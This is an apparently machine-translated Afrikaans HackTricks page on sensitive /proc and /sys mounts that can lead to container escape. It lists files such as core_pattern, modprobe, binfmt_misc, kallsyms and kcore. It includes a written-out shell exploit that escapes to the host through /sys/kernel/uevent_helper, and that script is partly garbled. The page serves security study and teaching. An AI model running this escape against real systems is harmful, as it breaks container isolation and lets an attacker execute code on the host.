Sensitive Mounts
Last updated
Last updated
Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Die blootstelling van /proc
en /sys
sonder behoorlike naamruimte-isolasie stel beduidende sekuriteitsrisiko's in, insluitend die vergroting van die aanvaloppervlak en inligtingsontsluiting. Hierdie gidse bevat sensitiewe lêers wat, indien verkeerd geconfigureer of deur 'n nie-geautoriseerde gebruiker toegang verkry, kan lei tot houer ontsnapping, gasheer-modifikasie, of inligting kan verskaf wat verdere aanvalle ondersteun. Byvoorbeeld, om -v /proc:/host/proc
verkeerd te monteer kan AppArmor-beskerming omseil weens sy pad-gebaseerde aard, wat /host/proc
onbeskermd laat.
Jy kan verdere besonderhede van elke potensiële kwesbaarheid vind in https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts.
/proc/sys
Hierdie gids laat toegang toe om kernvariabeles te wysig, gewoonlik via sysctl(2)
, en bevat verskeie subgidse van kommer:
/proc/sys/kernel/core_pattern
Beskryf in core(5).
Laat toe om 'n program te definieer wat uitgevoer moet word op kernlêer-generasie met die eerste 128 bytes as argumente. Dit kan lei tot kode-uitvoering as die lêer met 'n pyp |
begin.
Toetsing en Exploit Voorbeeld:
/proc/sys/kernel/modprobe
Gedetailleerd in proc(5).
Bevat die pad na die kernmodule-laaier, wat aangeroep word om kernmodules te laai.
Kontroleer Toegang Voorbeeld:
/proc/sys/vm/panic_on_oom
Verwys na proc(5).
'n Globale vlag wat beheer of die kern paniek of die OOM-killer aanroep wanneer 'n OOM-toestand voorkom.
/proc/sys/fs
Volgens proc(5), bevat opsies en inligting oor die lêerstelsel.
Skrywe toegang kan verskeie ontkenning van diens-aanvalle teen die gasheer moontlik maak.
/proc/sys/fs/binfmt_misc
Laat toe om interpreteerders vir nie-inheemse binêre formate te registreer gebaseer op hul magiese nommer.
Kan lei tot privilige-eskalasie of wortel-sheltoegang as /proc/sys/fs/binfmt_misc/register
skryfbaar is.
Betrokke exploit en verduideliking:
Diepgaande tutoriaal: Video skakel
/proc
/proc/config.gz
Mag die kernkonfigurasie onthul as CONFIG_IKCONFIG_PROC
geaktiveer is.
Nuttig vir aanvallers om kwesbaarhede in die lopende kern te identifiseer.
/proc/sysrq-trigger
Laat toe om Sysrq-opdragte aan te roep, wat moontlik onmiddellike stelselhervattings of ander kritieke aksies kan veroorsaak.
Hervatting van Gasheer Voorbeeld:
/proc/kmsg
Blootstel kernringbufferboodskappe.
Kan help in kern exploits, adreslekasies, en sensitiewe stelselinligting verskaf.
/proc/kallsyms
Lys kern-eksporteerde simbole en hul adresse.
Essensieel vir kern exploit ontwikkeling, veral om KASLR te oorkom.
Adresinligting is beperk met kptr_restrict
op 1
of 2
gestel.
Besonderhede in proc(5).
/proc/[pid]/mem
Interfereer met die kern geheue toestel /dev/mem
.
Histories kwesbaar vir privilige-eskalasie-aanvalle.
Meer op proc(5).
/proc/kcore
Verteenwoordig die stelsels fisiese geheue in ELF kernformaat.
Lees kan die gasheerstelsel en ander houers se geheue-inhoud lek.
Groot lêergrootte kan lei tot leesprobleme of sagteware-krake.
Gedetailleerde gebruik in Dumping /proc/kcore in 2019.
/proc/kmem
Alternatiewe interfase vir /dev/kmem
, wat kern virtuele geheue verteenwoordig.
Laat lees en skryf toe, dus direkte wysiging van kern geheue.
/proc/mem
Alternatiewe interfase vir /dev/mem
, wat fisiese geheue verteenwoordig.
Laat lees en skryf toe, wysiging van alle geheue vereis om virtuele na fisiese adresse op te los.
/proc/sched_debug
Teruggee proses skedulering inligting, wat PID naamruimte beskermings omseil.
Blootstel prosesname, ID's, en cgroup identifiseerders.
/proc/[pid]/mountinfo
Verskaf inligting oor monteerpunte in die proses se monteer naamruimte.
Blootstel die ligging van die houer rootfs
of beeld.
/sys
Kwesbaarhede/sys/kernel/uevent_helper
Gebruik vir die hantering van kern toestel uevents
.
Skryf na /sys/kernel/uevent_helper
kan arbitrêre skripte uitvoer wanneer uevent
triggers plaasvind.
Voorbeeld vir Exploit: %%%bash
echo "#!/bin/sh" > /evil-helper echo "ps > /output" >> /evil-helper chmod +x /evil-helper
host_path=$(sed -n 's/.\perdir=([^,]).*/\1/p' /etc/mtab)
echo "$host_path/evil-helper" > /sys/kernel/uevent_helper
echo change > /sys/class/mem/null/uevent
cat /output %%%
/sys/class/thermal
Beheer temperatuurinstellings, wat moontlik DoS-aanvalle of fisiese skade kan veroorsaak.
/sys/kernel/vmcoreinfo
Lek kern adresse, wat moontlik KASLR in gevaar stel.
/sys/kernel/security
Huisves securityfs
interfase, wat konfigurasie van Linux Sekuriteitsmodules soos AppArmor toelaat.
Toegang kan 'n houer in staat stel om sy MAC-stelsel te deaktiveer.
/sys/firmware/efi/vars
en /sys/firmware/efi/efivars
Blootstel interfaces vir interaksie met EFI veranderlikes in NVRAM.
Misconfigurasie of eksploit kan lei tot gebroke skootrekenaars of onbootbare gasheer masjiene.
/sys/kernel/debug
debugfs
bied 'n "geen reëls" debugging interfase aan die kern.
Geskiedenis van sekuriteitskwessies weens sy onbeperkte aard.
Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)